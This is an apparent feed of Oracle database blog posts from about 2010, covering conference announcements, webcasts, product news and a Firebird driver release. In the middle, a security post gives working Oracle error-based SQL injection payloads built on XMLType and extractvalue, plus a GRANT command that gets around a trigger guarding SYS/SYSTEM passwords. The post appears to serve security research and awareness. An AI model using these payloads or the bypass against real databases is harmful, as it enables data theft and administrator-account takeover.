I recently sat down with Ian "Fresh" Burns, design coordinator for the BMW ORACLE Racing trimaran, and talked about how technology helped win back the America's Cup. An amazing sight to see on the water, the BMW ORACLE Racing trimaran is able to travel at 4 times the wind speed, is as large as a baseball diamond, and has a wing sail that's 23 stories tall. Some of you will be interested to learn from Fresh how Oracle Database 11g played a major part in helping BMW ORACLE Racing win the oldest active trophy in International sport. Plus, Fresh shares a couple of other interesting bits about the race.

To learn more, tune into our podcast conversation with Fresh.

var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));


try {
var pageTracker = _gat._getTracker("UA-13185312-1");
pageTracker._trackPageview();
} catch(err) {}

Oracle OpenWorld 2010 Call For Papers is now open.

Oracle OpenWorld is the place to present your database ideas, experiences, and accomplishments to tens of thousands of the world's most demanding Oracle users.

Submit a database paper and you could present your ideas to the highest-profile technology thought leaders, C-level executives from the Fortune 100, peers from around the world, and the most-influential members of the media.

We are eager to hear your database ideas, implementations and experiences, and we invite you to share them with the entire Oracle community. Now is your chance to be heard. This CFPs closes 11:59 pm PDT on Sunday, March 21

Get started at http://ow.ly/1eJYk

We'll see you at the show!

var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));


try {
var pageTracker = _gat._getTracker("UA-13185312-1");
pageTracker._trackPageview();
} catch(err) {}

From An Expert's Guide to Oracle Technology March 1-7 is National Procrastination Week (NPW). Happy NPW! I meant to write about it last week. But I was celebrating it instead. ;-) LewisC

Ladies, gentlemen,

"InterXpress for Firebird" is our driver that supports Borlands dbExpress technology! Today we release version 2.3.0 of our driver, this version includes support for Delphi 2010.

You can download a copy of it http://www.upscene.com .

Currently supported are Delphi 6, Delphi 7, BDS 2006, Delphi 2007, RAD Studio/Delphi 2009/2010, Kylix 3 and C++Builder 6.

What's fixed, new and changed? Check it out here:
http://customer.upscene.com/script/mantisgateway.exe/fixed?fixedin=2.3.0&projectid=19
http://customer.upscene.com/script/mantisgateway.exe/fixed?fixedin=2.2.0&projectid=19
http://customer.upscene.com/script/mantisgateway.exe/fixed?fixedin=2.1.0&projectid=19


With InterXpress for Firebird you have guaranteed access to Firebird and all its features. The driver comes in two versions:

- Desktop Edition
- Server Edition

All versions come with a full year of support and maintenance updates. The support period can be extended at a reduced price after the first year.

Desktop Edition

The Desktop Edition is aimed at deploying and developing applications that use a localhost or local protocol connection and accepts up to four connections per client process. The license includes full rights to deploy the driver at any number of sites for any number of workstations.

Server Edition

The Server Edition is aimed at deploying and developing applications that require a remote connection (client/server) and allows unlimited connections from a single client process. The license includes unlimited rights to deploy the driver at any number of sites for any number of workstations and/or servers.

Mark your calendar for the 2010 Oracle Spatial User Conference, April 29 in Phoenix. This annual event, held in tandem with the GITA Geospatial Infrastructure Solutions Conference, continues to grow in popularity. Check out this year's agenda for some great case studies from the US Census Bureau, AngloAshanti Gold, and lots more. Oracle's hosting some cool new technical workshops, too. Register here.

Get more information about Oracle Spatial 11g on oracle.com and OTN.

var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));


try {
var pageTracker = _gat._getTracker("UA-13185312-1");
pageTracker._trackPageview();
} catch(err) {}

In case you missed the live event, a replay of the webcast Consolidate for Business Advantage: From Storage to Scorecard is now available.

With insights into enterprise-wide information, companies can support a broad range of strategic, financial, and operational processes that meet their extreme performance, scalability, and total cost of ownership requirements. But getting actionable and timely information in the hands of the right decision makers can be tricky, especially when you must consolidate data from disparate systems throughout the enterprise.

As the market leader in data warehousing, enterprise performance management, and business intelligence, Oracle combines best-in-class capabilities to provide a complete, open, and integrated solution from storage to scorecard. Watch this webcast to learn how to:

• Drive pervasive insights and decision-making with Oracle Business Intelligence
• Unify enterprise information at low cost with Oracle Data Integration Suite
• Get extreme performance and manage data growth with Oracle data warehousing

I would have named it the DB Horcrux. Think about it.

For some time, Infiniband has been working its way into the data center as the fabric of choice for low latency, high bandwidth database environments. And with Oracle Exadata V2, Oracle introduced the perfect example of a massively parallel database grid using OFA-driven Infiniband. In addition, now that Oracle is integrating Sun Microsystems' portfolio of Infiniband products and technologies, Oracle is uniquely positioned to deliver truly extreme performance throughout the enterprise

To learn more, join Oracle at the Sonoma Workshop 2010 on March 15th. Tim Shetler, VP of Oracle Product Management, is hosting a session on how Oracle is using Infiniband to enable massively scalable databases and to meet the demanding I/O requirements of today's and tomorrow's Data Warehousing and OLTP applications.

Register and get details here.

From An Expert's Guide to Oracle Technology First, they announced that you could go to the full day symposium without paying for a full conference pass and now they are giving away a free pass to the conference! Yep, you can get a free pass to OD

Oracle Magazine March/April features articles on enterprise software applications, application grid architecture, partitions, Tom Kyte on Edition-Based Redefinition, Oracle Application Express and much more.

If attendance at trade shows is any sort of indicator of how the economy is doing, than the TDWI World Conference in Vegas proves that the economy is on an upswing - according to organizers there were over 700 paid attendees, a significant uptick from recent events. The Oracle booth drew a large crowd interested in learning about the wide range of Oracle solutions for data warehousing and business intelligence, including the Sun Oracle Database Machine, Oracle Database 11g, Oracle Data Integrator, Oracle Business Intelligence Enterprise Edition and Oracle Essbase.

Oracle hosted a free 2-hour Oracle Data Warehousing Best Practices Workshop. This session is quickly becoming an Oracle highlight at TDWI, with attendees walking away with practical tips and tricks from Oracle product managers for optimizing the performance of their data warehouse. Equally valuable was the information about deploying Oracle in their real-world environments users shared with each other during the session.

Next stop: the TDWI World Conference in Chicago - see you there!

var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));


try {
var pageTracker = _gat._getTracker("UA-13185312-1");
pageTracker._trackPageview();
} catch(err) {}

The Independent Oracle User Group (IOUG) is an excellent source of information, learning and knowledge sharing on all aspects of Oracle technologies and applications. In addition to organizing events (e.g. Collaborate 10, April 18-22 in Las Vegas), Special Interest Groups (e.g. RAC, Exadata, etc.) and Webcasts, the IOUG regularly runs independent surveys of its member organizations.

Here's a great example; the IOUG's 2010 Enterprise Platform Survey examines the challenges organizations today are facing and the steps IT departments are taking to better manage their data centers. The Executive Summary of findings makes interesting reading, and the full report can be found here (requires log in to IOUG site).

var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));


try {
var pageTracker = _gat._getTracker("UA-13185312-1");
pageTracker._trackPageview();
} catch(err) {}

As a data architect, the data model makes me vomit just a little in the back of my throat. I can see many hands, much time and little discipline.

Today I came across a nice blog article “Methods of quick exploitation of blind SQL Injection Vulnerabilities in Oracle” from Dmitry Evteev about new techniques which can be used in error-based SQL injection. One of the comments contains an additional technique. Even if the title of the blog is not correct for Oracle (it’s not blind SQL Injection it’s error based which is a small but important difference) the idea itself is nice. Sometimes the SQL statements are more complicated than necessary.

Using error messages of XMLType:

The XMLType allows to create error messages containing custom strings (like database users, passwords, …). The string must start with a ‘<:’ that’s why we have to concatenate  ‘<:’  to the string.  Additionally the all spaces and at-signs must be replaced.

SQL> select XMLType((’<:’||user||’>’)) from dual;
ERROR:
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00110: Warning: invalid QName “:SYS” (not a Name)
Error at line 1
ORA-06512: at “SYS.XMLTYPE”, line 0
ORA-06512: at line 1

SQL> select XMLType((’<:’||replace((select banner from v$version where rownum=1) ,’ ‘,”)||’>’)) from dual;
ERROR:
19
ORA-19202: Error occurred in XML processing
LPX-00110: Warning: invalid QName
“:Oracle9iEnterpriseEditionRelease9.2.0.8.0-Production” (not a Name)
Error at line 1
ORA-06512: at “SYS.XMLTYPE”, line 0
ORA-06512: at line 1

This can be used in an SQL Injection statement:

or 1=length(XMLType((’<:’||replace((select banner from v$version where rownum=1) ,’ ‘,”)||’>’)))–

The second technique is mentioned in the comments: 

SQL> select extractvalue(xmltype(’<x/>’),’/$’||(SELECT banner FROM v$version where rownum=1)) from dual;

*
ERROR at line 1:
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00601: Invalid token in: ‘/$Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product‘

 This can be used in an SQL Injection statement:

or 1=length(extractvalue(xmltype(’<x/>’),’/$’||(SELECT banner FROM v$version where rownum=1)))–

I found the following nice article “How to Prevent a User Granted the ALTER USER Privilege From Changing SYS/SYSTEM password” [271077.1] on My Oracle Support. As always if I see PL/SQL code I am looking for ways to find security problems or to bypass limitations.

SQL> conn  / as sysdba
Connected.

SQL> CREATE or REPLACE TRIGGER prohibit_alter_SYSTEM_SYS_pass
AFTER ALTER on SCOTT.schema
BEGIN
IF ora_sysevent=’ALTER’ and ora_dict_obj_type = ‘USER’ and
(ora_dict_obj_name = ‘SYSTEM’ or ora_dict_obj_name = ‘SYS’)
THEN
RAISE_APPLICATION_ERROR(-20003,
‘You are not allowed to alter SYSTEM/SYS user.’);
END IF;
END;
/

Trigger created.

SQL> conn scott/tiger
Connected.

SQL>alter user system identified by alex;
alter user system identified by alex
*
ERROR at line 1:
ORA-00604: error occurred at recursive SQL level 1
ORA-20003: You are not allowed to alter SYSTEM/SYS user.
ORA-06512: at line 5

SQL> alter user sys identified by alex;
alter user sys identified by alex
*
ERROR at line 1:
ORA-00604: error occurred at recursive SQL level 1
ORA-20003: You are not allowed to alter SYSTEM/SYS user.
ORA-06512: at line 5

SQL> alter user dbsnmp identified by dbsnmp;
User altered.

Many Oracle users are not aware that the grant command can also be used to change passwords or even create users (”grant dba to user1,user2 identified by user1,user2″). In our case we can use this technique to bypass the database trigger.
SQL> grant connect to sys identified by alex;
Grant succeeded.

SQL> grant connect to system identified by alex;
Grant succeeded.

To fix this problem we have to block grant commands as well….

Join well known Oracle expert Tom Kyte, Senior Technical Architect in Oracle's Server Technology Division - host of AskTom.Oracle.Com to learn the latest best practices, hints, and tips for successful upgrades to Oracle Database 11g. If you are planning to upgrade from Oracle9i Database or Oracle Database 10g, this live Webcast is a rare opportunity to learn firsthand from the Oracle expert on everything you need to know about upgrading to Oracle Database 11g including:

-All the required preparatory steps
-Database upgrade strategies
-Post upgrade performance analysis
-Helpful tips and common pitfalls to watch out for.

Register for this Tuesday, March 26, 2010 10:00am PT | 1:00pm ET event

var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));


try {
var pageTracker = _gat._getTracker("UA-13185312-1");
pageTracker._trackPageview();
} catch(err) {}

According to "The Forrester Waveâ„¢: Predictive Analytics And Data Mining Solutions, Q1 2010" report written by Forrester Senior Analyst James G. Kobielus, Oracle is a Leader in predictive analytics and data mining (PA/DM).

Kobielus states that, "Oracle provides a PA/DM solution portfolio that is built into its own widely adopted DBMS, DW, data integration, and BI platforms, with a wide range of prepackaged predictive applications, and it provides a powerful assortment of algorithms for mining complex structured and unstructured information types."

Oracle Data Mining is an option to Oracle Database 11g Enterprise Edition that enables customers to integrate actionable predictive information and build into business intelligence and other applications. Using the data mining functionality in Oracle Database 11g, customers can easily find patterns and insights otherwise hidden in their data warehouses.

The Sun Oracle Database Machine delivers increased Oracle Data Mining performance by performing scoring of data mining models in Oracle Exadata Storage Servers.

Read the report here.

PHP and Profiling. Gonna be there?

Longtime computer graphics software leader Bentley Systems is using Oracle Database 11g and the 3D capabilities of Oracle Spatial 11g to support city modeling, urban planning, and other 3D mapping and analysis applications. Listen to this new Oracle Database Podcast to find out more.

var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));


try {
var pageTracker = _gat._getTracker("UA-13185312-1");
pageTracker._trackPageview();
} catch(err) {}